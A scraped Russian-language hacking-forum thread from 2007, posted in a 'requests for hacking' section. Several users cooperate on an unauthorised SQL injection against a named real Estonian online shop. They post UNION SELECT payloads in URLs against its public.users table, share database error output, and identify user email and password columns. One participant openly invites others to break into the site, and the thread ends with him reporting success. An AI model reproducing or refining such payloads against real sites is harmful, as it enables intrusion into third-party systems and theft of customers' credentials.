ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > SЕО/Финансовые задачи/Социальные сети > Покупка, Продажа, Обмен > Просьбы о взломах
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 04.09.2007, 17:29
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549

Репутация: 1318


Отправить сообщение для groundhog с помощью ICQ
По умолчанию

Действительно постгрес, но переменные хорошо фильтруются, есть баг в корзинке, но вывод преобразуется к числу с плавающей точкой...
 

  #12  
Старый 04.09.2007, 17:30
geezer.code
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489

Репутация: 1359


По умолчанию

может попробовать двойной юнион ?
-1+UNION+SELECT+null,userid,null,null,null,null,nul l,null+from+public.users
+union+select+null,0 as cur.jrk,null,null,null,null,nul l,null

тогда в конце припишется " ORDER BY cur.jrk ASC "

имхо может прокатить
 

  #13  
Старый 04.09.2007, 17:43
zjuk@
Новичок
Регистрация: 04.09.2007
Сообщений: 13
Провел на форуме:
29295

Репутация: 4
Отправить сообщение для zjuk@ с помощью ICQ
По умолчанию

Цитата:
Сообщение от geezer.code  
может попробовать двойной юнион ?
-1+UNION+SELECT+null,userid,null,null,null,null,nul l,null+from+public.users
+union+select+null,0 as cur.jrk,null,null,null,null,nul l,null

тогда в конце припишется " ORDER BY cur.jrk ASC "

имхо может прокатить
точка ему тут не нравится cur.jrk, и так %2E не катит
ERROR: syntax error at or near "." at character 145
 

  #14  
Старый 04.09.2007, 17:47
zjuk@
Новичок
Регистрация: 04.09.2007
Сообщений: 13
Провел на форуме:
29295

Репутация: 4
Отправить сообщение для zjuk@ с помощью ICQ
По умолчанию

прои такой строчке:
http://хххххх.уу/index.da?ln=est&do=my_cart&shipping_method=-10+union+select+null,userid+from+public.users+wher e+userid=2031
выводит 2031, но других полей кроме userid просто не могу подобрать, выводит : column XXx is not exist
pass, passwrd, pswrd, psswrd, password, drowssap i t.d. нот экзист и всё тут =(
 

  #15  
Старый 04.09.2007, 17:54
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549

Репутация: 1318


Отправить сообщение для groundhog с помощью ICQ
По умолчанию

В том, то и прикол что вывод идёт числового поля... И кроме как числовые данные ты с Union туда засунуть не сможешь...
 

  #16  
Старый 04.09.2007, 17:57
zjuk@
Новичок
Регистрация: 04.09.2007
Сообщений: 13
Провел на форуме:
29295

Репутация: 4
Отправить сообщение для zjuk@ с помощью ICQ
По умолчанию

вот сам сайт http://datagate.ee кому интересно, можете поломать, вместе оно быстрее будет
 

  #17  
Старый 05.09.2007, 00:15
zjuk@
Новичок
Регистрация: 04.09.2007
Сообщений: 13
Провел на форуме:
29295

Репутация: 4
Отправить сообщение для zjuk@ с помощью ICQ
По умолчанию

так, удалось выявить существование таких полей в таблице users:
1 userid
2 useremail
3 userpassword
однако тайп мисматч не даёт туда ворваться, числовые параметры требует =(
 

  #18  
Старый 05.09.2007, 00:32
zjuk@
Новичок
Регистрация: 04.09.2007
Сообщений: 13
Провел на форуме:
29295

Репутация: 4
Отправить сообщение для zjuk@ с помощью ICQ
По умолчанию

странно такое написание система допускает:
http://datagate.ee/index.da?ln=est&do=my_cart&shipping_method=-11+union+select+null,userid+from+public.users+wher e+userid=2036
возвращает значение 2036

а такое нет
http://datagate.ee/index.da?ln=est&do=my_cart&shipping_method=-11+union+select+null,userpassword+from+public.user s+where+userpassword=987654321
Почему?
 

  #19  
Старый 05.09.2007, 10:13
zjuk@
Новичок
Регистрация: 04.09.2007
Сообщений: 13
Провел на форуме:
29295

Репутация: 4
Отправить сообщение для zjuk@ с помощью ICQ
По умолчанию

всё, проблема решена всем спасибо. Можно закрывать тему
 
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
ZBrute Zadoxlik ICQ 322 20.04.2010 13:03
SQL injection в MySql сервере версии 3,x bandera Чужие Статьи 3 04.06.2006 16:17
Общие Рекомендации Защиты (MySQL и SQL Web-интерфейс) k00p3r Чужие Статьи 0 13.06.2005 11:22
Защищаем MySql. Шаг за шагом k00p3r Чужие Статьи 0 13.06.2005 11:18



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ